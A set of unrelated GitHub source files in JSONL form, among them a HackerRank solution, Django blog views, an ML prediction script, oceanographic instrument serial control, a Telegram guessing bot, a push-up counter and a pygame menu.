photon_energy, timestamp, tstring)\n smldata.event(raws=raw, photon_energies=photon_energy, timestamps=timestamp)\n\n if n_events > -1:\n if nevt>n_events: break\n \n smldata.save()\n smldata.close()\n print('Done with run %d'%run)\n \n","repo_name":"monarin/divelite","sub_path":"xtc1to2/cspad_save_lcls1.py","file_name":"cspad_save_lcls1.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13563750159","text":"\"\"\"\nKevin and Stuart want to play the 'The Minion Game'.\n\nGame Rules\n\nBoth players are given the same string, .\nBoth players have to make substrings using the letters of the string .\nStuart has to make words starting with consonants.\nKevin has to make words 
starting with vowels. \nThe game ends when both players have made all possible substrings. \n\nScoring\nA player gets +1 point for each occurrence of the substring in the string .\n\nFor Example:\nString = BANANA\nKevin's vowel beginning word = ANA\nHere, ANA occurs twice in BANANA. Hence, Kevin will get 2 Points. \n\nYour task is to determine the winner of the game and their score.\n\nInput Format\n\nA single line of input containing the string . \nNote: The string will contain only uppercase letters: .\n\nConstraints\n\n\n\nOutput Format\n\nPrint one line: the name of the winner and their score separated by a space.\n\nIf the game is a draw, print Draw.\n\nExample:\n>>> minion_game(\"BANANA\")\n'Stuart 12'\n\n\"\"\"\n\n\ndef minion_game(string):\n vowels = {\"A\", \"E\", \"I\", \"O\", \"U\"}\n len_word = len(string)\n Stuart = []\n Kevin = []\n\n for i in range(len_word):\n if string[i] not in vowels:\n for j in range(i + 1, len_word + 1):\n Stuart.append(string[i:j])\n for i in range(len_word):\n if string[i] in vowels:\n for j in range(i + 1, len_word + 1):\n Kevin.append(string[i:j])\n if len(Stuart) > len(Kevin):\n print(\"Stuart {}\".format(len(Stuart)))\n elif len(Stuart) == len(Kevin):\n print(\"Draw\")\n else:\n print(\"Kevin {}\".format(len(Kevin)))\n","repo_name":"kritikadusad/HackerRank","sub_path":"TheMinionGame.py","file_name":"TheMinionGame.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2299743848","text":"from django.shortcuts import render\nfrom django.shortcuts import redirect\nfrom django.shortcuts import get_object_or_404\nfrom django.contrib.auth.models import User\nfrom apps.user.models import Profile, ProfileSubscriber\nfrom allauth.account.forms import LoginForm\nfrom apps.custom_auth.views import session_account_manager\nfrom apps.portal.models import Article, Category, Comment, ReplyComment, ArticleLike\nfrom django.db.models import Q\nfrom django.views.generic import View\nfrom apps.user.forms import subscribeForm\nfrom apps.portal.forms import commentForm\n\ndef get_User(username):\n UserObject = get_object_or_404(User, username=username)\n return UserObject\n\ndef get_Profile(username):\n user = get_User(username)\n if Profile.objects.filter(user=user).count() == 0:\n Profile.objects.create(user=user)\n \n ProfileObject = get_object_or_404(Profile, user=user)\n return ProfileObject\n\ndef get_Sub(username):\n Subscribers = ProfileSubscriber.objects.filter(author=get_Profile(username))\n return Subscribers\n\n\nclass Main(View):\n def get(self, request):\n title = 'IT-blog | Статьи, Уроки, Форум'\n template = 'portal/index.html'\n name = 'main'\n\n if request.user.is_authenticated:\n Subscribers = request.user.profile.get_subscribers()\n sub_str = request.user.profile.get_subscribers_str(Subscribers)\n\n else:\n sub_str = None\n\n request = session_account_manager(request)\n saved_account = request.session['saved_account']\n request.session['last_page'] = request.path\n\n context = { 'title': title, 'subscribers_value': sub_str, 'saved_account': saved_account, 'name': name }\n\n return render(request, template, context)\n\nclass Articles(View):\n def get(self, request):\n title = 'IT-blog | Статьи'\n name = 'post'\n template = 'portal/posts.html'\n\n request = session_account_manager(request)\n saved_account = request.session['saved_account']\n login_form = LoginForm()\n request.session['last_page'] = request.path\n\n sort = request.GET.get('sort')\n 
category_slug = request.GET.get('category', 'all')\n q = request.GET.get('q')\n\n if q:\n request.session['post_search'] = q\n if category_slug == 'all':\n articles = Article.objects.filter(\n Q(title__icontains=q)|\n Q(content__icontains=q)\n ).order_by('-timestamp')\n\n else:\n category = get_object_or_404(Category, slug=category_slug)\n articles = Article.objects.filter(\n Q(title__icontains=q, category=category)|\n Q(content__icontains=q, category=category)\n ).order_by('-timestamp')\n\n else:\n request.session['post_search'] = None\n if category_slug == 'all':\n articles = Article.objects.order_by('-timestamp')\n else:\n category = get_object_or_404(Category, slug=category_slug)\n articles = Article.objects.filter(category=category).order_by('-timestamp')\n\n if sort == 'asc':\n articles = articles.order_by('timestamp')\n\n try:\n last_search_q = request.session['post_search']\n except:\n last_search_q = None\n\n categories = Category.objects.all()\n\n return render(request, template, locals())\n\nclass Post(View):\n def get(self, request, pk=0):\n template = 'portal/post-view.html'\n name = 'post'\n\n request = session_account_manager(request)\n saved_account = request.session['saved_account']\n login_form = LoginForm()\n request.session['last_page'] = request.path\n\n is_liked = None\n is_sub = None\n\n if pk == 0:\n return redirect('/articles/')\n\n else:\n article = get_object_or_404(Article, pk=pk)\n\n if request.GET.get('action') == None:\n article.add_view()\n\n comments = Comment.objects.filter(article=article)\n replyComments = ReplyComment.objects.filter(article=article)\n\n comments_count = len(comments) + len(replyComments)\n\n comments_str = str(comments_count) + ' комментар'\n\n if comments_count == 1:\n comments_str += 'ий'\n\n elif comments_count > 0 and comments_count < 5:\n comments_str += 'ия'\n \n else:\n comments_str += 'иев'\n\n\n title = 'IT-blog | ' + article.title\n subs = article.author.get_subscribers()\n if subs is not None:\n subscribers_value = str(len(subs))\n else:\n subscribers_value = 0\n\n if request.user.is_authenticated:\n if ArticleLike.objects.filter(profile=request.user.profile, article=article).count() == 0:\n is_liked = False\n else:\n is_liked = True\n\n if ProfileSubscriber.objects.filter(user=request.user, author=article.author).count() == 0:\n is_sub = False\n else:\n is_sub = True\n\n if request.GET.get('action') == 'like':\n if is_liked == False:\n like = ArticleLike.objects.create(profile=request.user.profile, article=article)\n like.save()\n return redirect(article.get_absolute_url() + '#like')\n\n if request.GET.get('action') == 'unlike':\n if is_liked:\n like = ArticleLike.objects.get(profile=request.user.profile, article=article)\n like.delete()\n return redirect(article.get_absolute_url() + '#like')\n\n popular = Article.objects.order_by('-view')[:5]\n\n context = { 'article': article, 'comments_count': comments_count, 'comments_str': comments_str, 'comments': comments,\n 'replyComments': replyComments, 'is_liked': is_liked, 'is_sub': is_sub, title: 'title',\n 'subscribe_form': subscribeForm(), 'comment_form': commentForm(), 'subs': subs, 'subscribers_value': subscribers_value,\n 'popular': popular, 'saved_account': saved_account, 'loginForm': login_form, 'name': name }\n\n return render(request, template, context)\n\n def post(self, request, pk=0):\n\n article = get_object_or_404(Article, pk=pk)\n\n if 'write_comment' in request.POST:\n comment_form = commentForm(request.POST, request.FILES)\n\n if comment_form.is_valid():\n\n 
comment = comment_form.save(commit=False)\n\n comment.author = request.user\n comment.article = article\n comment.image = request.FILES['image']\n comment.content = request.POST['content']\n \n comment.save()\n \n return redirect(article.get_absolute_url() + '#comments')\n\n\n if 'subscribe' in request.POST:\n\n if ProfileSubscriber.objects.filter(user=request.user, author=article.author).count() == 0:\n is_sub = False\n else:\n is_sub = True\n\n subscribe_form = subscribeForm(request.POST)\n\n if is_sub == False:\n if subscribe_form.is_valid():\n subscribe_form.save(request, article.author)\n\n else:\n if subscribe_form.is_valid():\n subscribe_form.delete(request, article.author)\n\n return redirect(article.get_absolute_url() + '#profileCard')\n \n\nclass ArticleNew(View):\n def get(self, request):\n name = 'post'\n title = 'IT-blog | Уроки'\n template = 'portal/post-new.html'\n\n request = session_account_manager(request)\n saved_account = request.session['saved_account']\n login_form = LoginForm()\n request.session['last_page'] = request.path\n\n return render(request, template, locals())\n\nclass Lesson(View):\n def get(self, request, pk=0):\n name = 'lesson'\n title = 'IT-blog | Уроки'\n template = 'portal/lessons.html'\n\n request = session_account_manager(request)\n saved_account = request.session['saved_account']\n login_form = LoginForm()\n request.session['last_page'] = request.path\n\n return render(request, template, locals())\n\nclass Top(View):\n def get(self, request):\n title = 'IT-blog | Топ #15'\n template = 'portal/top.html'\n name = 'top'\n\n request = session_account_manager(request)\n saved_account = request.session['saved_account']\n request.session['last_page'] = request.path\n\n top = Profile.objects.order_by('-sub_count')[:15]\n\n context = { 'title': title, 'saved_account': saved_account, 'top': top, 'name': name}\n return render(request, template, context)\n","repo_name":"Vilocer/it-portal","sub_path":"it_portal/apps/portal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31021089044","text":"import pandas as pd\nimport pickle as pkl\nimport numpy as np\nfrom sklearn.preprocessing import StandardScaler\n\ndata=pd.read_csv('Aripiprazol.csv')\n\n\n\nimport seaborn as sns\nsns.set(color_codes=True)\ng = sns.clustermap(data)\n\n\n\ndef read_model(name, feature_set):\n path='Models/'+name+feature_set+'.pkl'\n print(path)\n file=open(path, 'rb')\n model=pkl.load(file)\n return(model)\n\ndef create_feature_sets(data):\n predictors_6=['Brij', 'pH', 'acetonitril', 'Stretch Bend E', 'Non-1.4 VDW E', 'Rad', 'k']\n # Based on corellation\n predictors_15=['Brij', 'pH', 'acetonitril', 'Stretch Bend E', 'Non-1.4 VDW E', 'Rad', 'ShpC', 'H-don', 'H-acc', 'logP', 'pol', 'Ecd', 'Ed', 'Torsion E (Et)', 'Total Energy (E)', 'k']\n return ({'6_features':data[predictors_6], '15_features':data[predictors_15], '30_features':data})\n\ndef prepare_data(data):\n Y=data.iloc[:,-1] # label\n X=data.iloc[:,:-1] # input data\n scaler = StandardScaler()\n scaler.fit(X)\n X = scaler.transform(X)\n return (X, Y)\n\n\nnames=['ANN', 'GBT', 'K-NN', 'Lasso', 'LR', 'Random_Forest']\n\nfeature_sets=['_6_features', '_15_features', '_30_features']\n\ndatasets=create_feature_sets(data)\n\ndf=datasets['15_features']\nX,y=prepare_data(df)\n\ndf.head()\n\nmodel=read_model(names[1], feature_sets[1])\n\ny_hat=model.predict(X)\ny=np.array(y)\n\n\nimport matplotlib as mpl\nimport 
matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set(color_codes=True)\nnp.random.seed(sum(map(ord, \"regression\")))\n\nfrom sklearn.metrics import r2_score\n\nfrom sklearn.model_selection import cross_val_predict\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import LeaveOneOut\n\n#data['y_hat'] = cross_val_predict(model, X, y, cv=10)\n\n#data['diff']=np.abs(data.y_hat-data.k)\n\n'''\n\n'''\n\ndata['y_hat']=cross_val_predict(model, pd.DataFrame(X), y, cv=10)\ndata['diff']=abs(data.y_hat-data.k)\ndata['diff'].nlargest(3)\n\n\ndiff=np.column_stack((y,y_hat))\nabs_diff=np.abs(diff[:,0]-diff[:,1])\nnp.sort (abs_diff)\n\ndiff[:,0]-diff[:,1]\n\nabs_diff.arg_sort()[-3:][::-1]\n\nnp.argsort(abs_diff)\n\nabs_diff[73]\n\n[2,4,9]\n\ny[9]\ny[4]\ny[2]\n\nnp.concatenate(y,y_hat)\n\nnp.average(scores)\n\n\nfrom sklearn.ensemble import IsolationForest\n# fit the model\nrng = np.random.RandomState(42)\nclf = IsolationForest(random_state=rng)\nclf.fit(X)\ny_pred_train = clf.predict(X)\n\nX1=X[y_pred_train==1,:]\ny1=y[y_pred_train==1]\nlen(y1)\n\nfig, ax = plt.subplots()\nax.scatter(y, y_hat, edgecolors=(0, 0, 0))\nax.plot([y.min(), y.max()], [y.min(), y.max()], 'k-', lw=4)\nax.set_xlabel('Measured')\nax.set_ylabel('Predicted')\nplt.title('')\nplt.show()","repo_name":"vucko83/Pharma_research","sub_path":"Old/Predictions_and_Viz.py","file_name":"Predictions_and_Viz.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"23367611335","text":"from .serial_common import Serial_instrument\nfrom . import common, seabird_configure\n\n## This module shall contain functions/methods etc common to one or more Seabird\n## instruments. To access the serial driver, all functions etc must call the\n## serial_common module, NOT THE SERIAL DRIVER DIRECTLY. In this way, changes to\n## the serial driver will not require updates to this module.\n\nclass Seabird_instrument(Serial_instrument):\n def __init__(self):\n # Initialize shared Instrument superclass attributes...\n super().__init__()\n\n def sbe_cmd(self, cmd):\n \"\"\"\n Send a command to an instrument, checking first that it has not timed out, or\n waking it if it has.\n \"\"\"\n if self.sbe_timedout():\n self.sbe_get_prompt()\n return self.cap_cmd(cmd)\n\n def sbe_get_reply(self, cmd):\n \"\"\"\n Send a command to an instrument and return the reply.\n \"\"\"\n self.cap_cmd(cmd)\n return self.buf\n\n def sbe_get_prompt(self):\n \"\"\"\n Wake instrument, check for '>' char in response (recognizes the executed tag or\n the S prompt...\n \"\"\"\n self.cap_cmd('')\n if \">\" in self.buf:\n return True\n else: return False\n\n def sbe_timedout(self):\n if not self.buffer_empty():\n self.cap_buf()\n if \"time out\" in self.buf:\n return True\n else:\n return False\n \n def sbe_connect(self):\n # Open a serial (RS232) connection...\n self.connect()\n\n # Get a prompt to confirm connection...\n while not self.sbe_get_prompt():\n if common.usertryagain(\"Failed to communicate with instrument.\"):\n continue\n else:\n common.usercancelled()\n return False\n\n # Send and parse a 'ds' command. 
Parsing paramaters must be set when instrument\n # class is instantiated...\n self.sbe_parse_ds()\n return True\n\n def sbe_parse_ds(self):\n \"\"\"\n Command an instrument to display its status and then parse out all the most\n commonly used elements...\n \"\"\"\n print(\"Introducing the %s...\" % self.name) \n ds = self.get_cmd('ds').split()\n self.serialnumber = \"%s-%s\" % (self.sbe_prefix, ds[self.sn_idx])\n self.firmware = ds[self.fw_idx]\n self.vbatt = common.dec_str(ds[self.vbatt_idx])\n\n def sbe_set_ref_configs(self):\n \"\"\"\n Puts an instrument into a known configuration prior to conducting another\n procedure, i.e. QCT, deployment, etc. Specific configurations are defined in an\n instrument's specific class definition.\n \"\"\"\n for config in self.ref_configs:\n self.cap_cmd('%s\\n' % config)\n return True\n\n def sbe_set_datetime(self, t):\n return self.cap_cmd('datetime=%s' % t)\n\n def sbe_set_startdatetime(self, t):\n return self.cap_cmd('startdatetime=%s' % t)\n\n def sbe_get_time(self):\n ds = self.sbe_get_reply('ds')\n ds_date = ' '.join(ds.split()[self.dt_idx[0]:self.dt_idx[1]])\n return common.formatdate(ds_date, '%d %b %Y %H:%M:%S')\n\n def sbe_clock_set_test(self, margin, conditions=['utc']):\n for condition in conditions:\n while True:\n if condition == 'noon':\n print(\"Setting clock to noon yesterday...\")\n t1 = common.noon_yesterday()\n elif condition == 'utc':\n print(\"Setting clock to current time UTC...\")\n t1 = common.current_utc()\n self.sbe_set_datetime(common.formatdate(t1, 'sbe')) \n t2 = self.sbe_get_time()\n if common.compare_times_ordered(t1, t2, margin):\n break\n else:\n if common.usertryagain(\"There was a problem setting the clock. The reported time is %s. The expected time is %s\" % (common.formatdate(t2, 'us'), common.formatdate(t1, 'us'))):\n continue\n else:\n return False\n return True\n\n def sbe_deploy(self):\n seabird_configure.init_deploy(self)\n\n ## Inductive/IMM instrument functions...\n ##\n def imm_timedout(self):\n if not self.buffer_empty():\n self.cap_buf()\n if \"TIMEOUT\" in self.buf:\n return True\n else:\n return False\n \n def imm_poweron(self):\n self.cap_cmd('')\n if \"S>\" in self.buf:\n return True\n elif \"IMM>\" in self.buf:\n return True\n else: return False\n \n def imm_setconfigtype(self, configtype, **kwargs):\n \"\"\"\n Check the configtype of the IMM and set to the desired configtype if not already\n set. The first param must be the desired configtype. This will reinitialize the\n IMM. 
Any additional configurations desired may be passed in as optional keyword\n value pairs.\n \n Example: instrument.imm_setconfigtype(configtype='1', setenablebinarydata='0')\n \"\"\"\n # Determine the currently set configtype of the imm...\n while True:\n print(\"Verifying IMM configuration...\")\n self.imm_cmd('getcd')\n configtypestr = \"ConfigType='\"\n i = self.buf.find(configtypestr)\n if i < 0: # For whatever reason, 'getcd' did not do what we expected...\n if not common.usertryagain(\"Could not get IMM configtype.\"):\n return False\n else: # If this was called before powering the IMM, etc., try again...\n continue\n current_configtype = self.buf[i + len(configtypestr)]\n \n # If different from intended configtype, change it...\n if configtype != current_configtype:\n print(\"Configuring IMM...\")\n self.imm_init()\n self.cap_cmd('setconfigtype=%s' % configtype)\n self.cap_cmd('setconfigtype=%s' % configtype)\n self.imm_poweron()\n for name, value in kwargs.items():\n self.imm_cmd(\"%s=%s\" % (name, value))\n continue\n return True\n\n def imm_init(self):\n self.cap_cmd('*INIT')\n self.cap_cmd('*INIT')\n return self.imm_poweron()\n \n def imm_init_connection(self): \n self.connect()\n\n # Establish communication with the IMM...\n self.imm_poweron()\n self.imm_cmd(\"gethd\")\n self.imm_setconfigtype(configtype='1', setenablebinarydata='0')\n \n # Establish communication with the instrument...\n print(\"Waking the instrument...\")\n self.imm_remote_wakeup()\n \n self.imm_get_remote_id()\n\n self.imm_cmd('#%soutputexecutedtag=n' % self.remote_id)\n ds = self.imm_remote_reply('ds').split()\n self.serialnumber = \"%s-%s\" % (self.sbe_prefix, ds[self.sn_idx])\n print(\"Serial no.: %s\" % self.serialnumber)\n return True\n\n def imm_cmd(self, cmd):\n \"\"\"\n Send a command to an IMM, checking first that the IMM has not timed out, or\n waking it if it has.\n \"\"\"\n if self.imm_timedout():\n self.imm_poweron()\n return self.cap_cmd(cmd)\n \n def imm_remote_wakeup(self):\n return self.imm_cmd('pwron')\n \n def imm_get_remote_id(self):\n while True:\n self.imm_cmd('id?')\n loc = self.buf.find('id = ')\n if loc == -1: # id not found in imm response...\n if common.usertryagain(\"Unable to get remote id.\"):\n continue\n else:\n return False\n self.remote_id = self.buf[loc+5:loc+7]\n return True\n \n def imm_set_remote_id(self, ID):\n i = 0\n while True:\n self.imm_get_remote_id()\n if self.remote_id == ID:\n return True\n if i:\n if not common.usertryagain(\"Failed to set remote id.\"):\n return False \n self.cap_cmd('*id=%s' % ID)\n self.cap_cmd('*id=%s' % ID)\n i += 1\n\n def imm_remote_reply(self, cmd):\n self.imm_cmd('#%s%s' % (self.remote_id, cmd))\n return self.buf\n \n def imm_set_datetime(self, t):\n return self.imm_cmd('#%sdatetime=%s' % (self.remote_id, t))\n\n def imm_set_startdatetime(self, t):\n return self.imm_cmd('#%sstartdatetime=%s' % (self.remote_id, t))\n\n def imm_remote_cmd(self, cmd):\n pass\n\n def imm_initlogging(self):\n self.imm_cmd('#%sinitlogging' % self.remote_id)\n if 'confirm' in self.buf:\n self.cap_cmd('#%sinitlogging' % self.remote_id)\n return True\n \n def imm_configure(self, cmdfile):\n seabird_configure.imm_configure(self, cmdfile)","repo_name":"asmith75218/cg_inst_automation","sub_path":"common/seabird_common.py","file_name":"seabird_common.py","file_ext":"py","file_size_in_byte":8982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32271425164","text":"from aiogram import Bot, Dispatcher, 
types, executor\nimport random\nimport decouple\nfrom config import token\n\nbot = Bot(token)\ndp = Dispatcher(bot)\n\n@dp.message_handler(commands='start')\nasync def start(message:types.Message):\n await message.answer(f\"Я загадал число от 1 до 3 угадайте {message.from_user.full_name}!\")\n\n@dp.message_handler()\nasync def guess_number(message:types.Message):\n user_number = message.text.strip()\n if not user_number.isdigit:\n await message.answer(\"Введите только число пожалуйста\")\n\n user_number = int(user_number)\n bot_number = random.randint(1, 3)\n\n if user_number == bot_number:\n await message.answer(\"Правильно! Вы отгадали!\")\n else:\n await message.answer(f\"Неправильно! Я загадал число {bot_number}\")\n\n\nif __name__ == '__main__':\n executor.start_polling(dp)\n\n ","repo_name":"kbnrma/hw1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5965409535","text":"# 参考\n# https://google.github.io/mediapipe/solutions/pose\n\nimport math\n\nimport cv2\nimport mediapipe as mp\nfrom playsound import playsound\n\nmp_drawing = mp.solutions.drawing_utils\nmp_drawing_styles = mp.solutions.drawing_styles\n# model load\nmp_pose = mp.solutions.pose\n\n# For static images:\nIMAGE_FILES = []\nBG_COLOR = (192, 192, 192) # gray\nwith mp_pose.Pose(\n static_image_mode=True,\n model_complexity=2,\n enable_segmentation=True,\n min_detection_confidence=0.5) as pose:\n for idx, file in enumerate(IMAGE_FILES):\n image = cv2.imread(file)\n image_height, image_width, _ = image.shape\n # Convert the BGR image to RGB before processing.\n results = pose.process(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))\n\n if not results.pose_landmarks:\n continue\n print(\n f'Nose coordinates: ('\n f'{results.pose_landmarks.landmark[mp_pose.PoseLandmark.NOSE].x * image_width}, '\n f'{results.pose_landmarks.landmark[mp_pose.PoseLandmark.NOSE].y * image_height})'\n )\n\n annotated_image = image.copy()\n # Draw segmentation on the image.\n # To improve segmentation around boundaries, consider applying a joint\n # bilateral filter to \"results.segmentation_mask\" with \"image\".\n condition = np.stack((results.segmentation_mask,) * 3, axis=-1) > 0.1\n bg_image = np.zeros(image.shape, dtype=np.uint8)\n bg_image[:] = BG_COLOR\n annotated_image = np.where(condition, annotated_image, bg_image)\n # Draw pose landmarks on the image.\n mp_drawing.draw_landmarks(\n annotated_image,\n results.pose_landmarks,\n mp_pose.POSE_CONNECTIONS,\n landmark_drawing_spec=mp_drawing_styles.get_default_pose_landmarks_style())\n cv2.imwrite('/tmp/annotated_image' + str(idx) + '.png', annotated_image)\n # Plot pose world landmarks.\n mp_drawing.plot_landmarks(\n results.pose_world_landmarks, mp_pose.POSE_CONNECTIONS)\n\n# For webcam input:\n# cap = cv2.VideoCapture(0)\n# cap = cv2.VideoCapture(1)\ncap = cv2.VideoCapture(\"sample_video\\pushup_sample.mp4\")\nfps = cap.get(cv2.CAP_PROP_FPS)\n# 3秒間に1度だけカウントするように定義する。\nmax_inference = fps * 3\n\npush_up_cnt = 0\nframe = 0\n# 画像保存用\ncount = 0\nwith mp_pose.Pose(\n min_detection_confidence=0.5,\n min_tracking_confidence=0.5) as pose:\n while cap.isOpened():\n frame +=1\n success, image = cap.read()\n if not success:\n print(\"Ignoring empty camera frame.\")\n # If loading a video, use 'break' instead of 'continue'.\n continue\n\n # To improve performance, optionally mark the image as not writeable to\n # pass by reference.\n image.flags.writeable = False\n image 
= cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n results = pose.process(image)\n\n # 判定する基準の設定\n if results.pose_landmarks:\n for idx, landmark in enumerate(results.pose_landmarks.landmark):\n if idx == 12: # 11: # 左肩\n left_shoulder = landmark\n if idx == 20: # 19: # 左手\n left_index = landmark\n # 2点間の距離を求める\n distance = math.sqrt((left_shoulder.x - left_index.x)**2 + (left_shoulder.y - left_index.y)**2)\n # print(distance)\n\n # countをn秒に1回にしたい。\n if frame > max_inference:\n if distance < 0.15:\n push_up_cnt += 1\n if push_up_cnt % 3 ==0:\n playsound(\"sound\\sample_sound.mp3\")\n # frame数の初期化\n frame = 0\n print('push up success', f'cnt : {push_up_cnt}')\n\n\n\n # Draw the pose annotation on the image.\n image.flags.writeable = True\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n mp_drawing.draw_landmarks(\n image,\n results.pose_landmarks,\n mp_pose.POSE_CONNECTIONS,\n landmark_drawing_spec=mp_drawing_styles.get_default_pose_landmarks_style())\n # Flip the image horizontally for a selfie-view display.\n # cv2.imshow('pushup_count', cv2.flip(image, 1))\n cv2.putText(image,\n text='pushup count : ' + str(push_up_cnt),\n org=(10, 40),\n fontFace=cv2.FONT_HERSHEY_SIMPLEX,\n fontScale=1.0,\n color=(0, 255, 0),\n thickness=3,\n lineType=cv2.LINE_4)\n cv2.imshow('pushup_count', image)\n # 画像保存\n # cv2.imwrite(f\"./result/{str(count).zfill(3)}_frame.jpg\", image)\n # count += 1\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\ncap.release()\ncv2.destroyAllWindows()","repo_name":"Kentea-Watanabe/push_up_count","sub_path":"src/pushup_app.py","file_name":"pushup_app.py","file_ext":"py","file_size_in_byte":4524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25827384900","text":"\"\"\"\r\n@author: CD2H3 members\r\n\r\n\"\"\"\r\nimport pygame\r\nimport sys\r\nimport os\r\nimport time\r\nfrom pygame.locals import *\r\nimport random\r\nimport hanoi\r\nimport puzzlegame\r\nimport sudoku\r\n\r\npygame.init()\r\nsize=(800,600)\r\nscreen = pygame.display.set_mode(size)\r\npygame.display.set_caption(\"Christmas game\")# window tittle\r\nbg = pygame.mixer.Sound('sound/Christmas music.mp3')\r\nback1 =pygame.image.load('images/back1.png')\r\nabout =pygame.image.load('images/about.jpg')\r\nabout1 =pygame.image.load('images/about1.png')\r\n\r\n\r\ndef show_image(image):\r\n\tbackground = pygame.image.load(image).convert() \r\n\tscreen = pygame.display.set_mode(size)\r\n\tscreen.blit(background,(0,0))\r\n\tpygame.display.update()\r\n\r\ndef toabout() :\r\n screen.blit(about,(0,0))# show \"how to play\"\r\n screen.blit(back1,(100,500))# show \"back\"\r\n bg.stop()# stop music\r\n\r\ndef main():\r\n show_image(\"images/Background.png\") #main page background\r\n screen.blit(about1, (600, 500))\r\n pygame.display.flip() # update the surface\r\n bg.set_volume(0.2)\r\n bg.play(-1) # Keep playing music\r\n while True:\r\n # quit game\r\n for event in pygame.event.get():\r\n if event.type==pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n \r\n #Mouse triggers three games \r\n elif event.type==MOUSEBUTTONDOWN:\r\n x=event.pos[0]\r\n y=event.pos[1]\r\n if (x in range(500,580) or x in range(700,780)) and y in range(335,360):\r\n bg.stop()\r\n puzzlegame.play() # play the Jigsaw Puzzle game\r\n # when the player win or exit the game\r\n # call main recursively to show the main interface and waiting for input form\r\n # user\r\n main()\r\n elif x in range(270,407) and y in range(424,470):#if the user clicks the middle window\r\n bg.stop()\r\n hanoi.play()#play the 
hanoi game\r\n #when the player win or exit the game\r\n #call main recursively to show the main interface and waiting for input form\r\n #user\r\n main()\r\n elif x in range(533,642) and y in range(182,210):\r\n bg.stop()\r\n sudoku.play() # play the sudoku game\r\n # when the player win or exit the game\r\n # call main recursively to show the main interface and waiting for input form\r\n # user\r\n main()\r\n elif x in range(600,700) and y in range(500,550):\r\n #bg.stop()\r\n toabout()\r\n pygame.display.flip()\r\n while True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT: # window closing event\r\n # pygame.quit()\r\n quit()\r\n elif event.type == pygame.MOUSEBUTTONDOWN: # mouse click event\r\n if pygame.mouse.get_pressed() == (1, 0, 0): # press the left mouse button\r\n # sound.play()\r\n mx, my = pygame.mouse.get_pos() # gets the current mouse coordinates\r\n if mx > 100 and mx < 200: # back to play\r\n if my > 500 and my < 550:\r\n main()\r\n # pygame.mixer.music.play(-1, 0.0, 0)\r\n\r\n return\r\n else:\r\n pass\r\n\r\n\r\n\r\n\r\n\r\nif __name__==\"__main__\":\r\n main()","repo_name":"marc0317-dsg/Pygame","sub_path":"git/New_CD2H3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28997770574","text":"# -*- Python -*-\n\nimport os\n\nfrom CXL_init import *\n\nImport('*')\n\nappName = \"CXLTeaPot-bin\"\n\nenv = CXL_env.Clone()\n\n#env.Append(CXL_commonproj_dir = env['CXL_common_dir'] + \"/../CommonProjects\")\ncompiler_base_flags = \" -Wall -g -fmessage-length=0 -Wno-unknown-pragmas -pthread -D_DEBUG \"\nenv.Replace(CPPFLAGS = compiler_base_flags)\n\nenv.Append( CPPPATH = [ \n \"./\",\n \"./inc\",\n \"../AMDTTeaPotLib/inc\",\n \"../AMDTTeaPotLib\",\n env['CXL_commonproj_dir'] + \"/AMDTOSWrappers/Include\",\n env['CXL_commonproj_dir'] + \"/AMDT/Include\",\n \"/usr/include/GL\",\n \"/usr/include/freetype2\",\n \"/usr/include/libpng12\",\n \"/usr/lib/x86_64-linux-gnu/glib-2.0/include\",\n \"/usr/include/freetype2\",\n\n])\n\nenv.Append( LIBPATH = [\n \"/usr/lib/x86_64-linux-gnu/mesa\",\n env['CXL_Examples_dir'] + \"/release\",\n])\n\n# Source files:\nsources = \\\n[\n# src:\n \"src/Teapot.cpp\",\n \"src/GLWindow.cpp\",\n]\n\ncommonLinkedLibraries = \\\n[\n \"fltk_gl.a\",\n \"fltk.a\",\n \"CXLTeaPot\",\n \"GL\",\n \"libglib-2.0\",\n \"X11\",\n \"dl\",\n \"pthread\",\n \"Xext\",\n \"Xft\",\n \"fontconfig\",\n \"Xcursor\",\n \"Xfixes\",\n \"Xinerama\"\n]\n\nlinkedLibraries = commonLinkedLibraries\nenv.Prepend (LIBS = linkedLibraries)\n\n\n# Set the ELF hash generation mode:\n# - When building on new systems, we would like to generate both sysv and gnu ELF hashes.\n# This enables running the executable also on old systems, that support only the sysv ELF hash.\n# - When building on old systems, we need to set the GR_GENERATE_ONLY_DEFAULT_ELF_HASH environment\n# variable (preferably in the .bashrc file). 
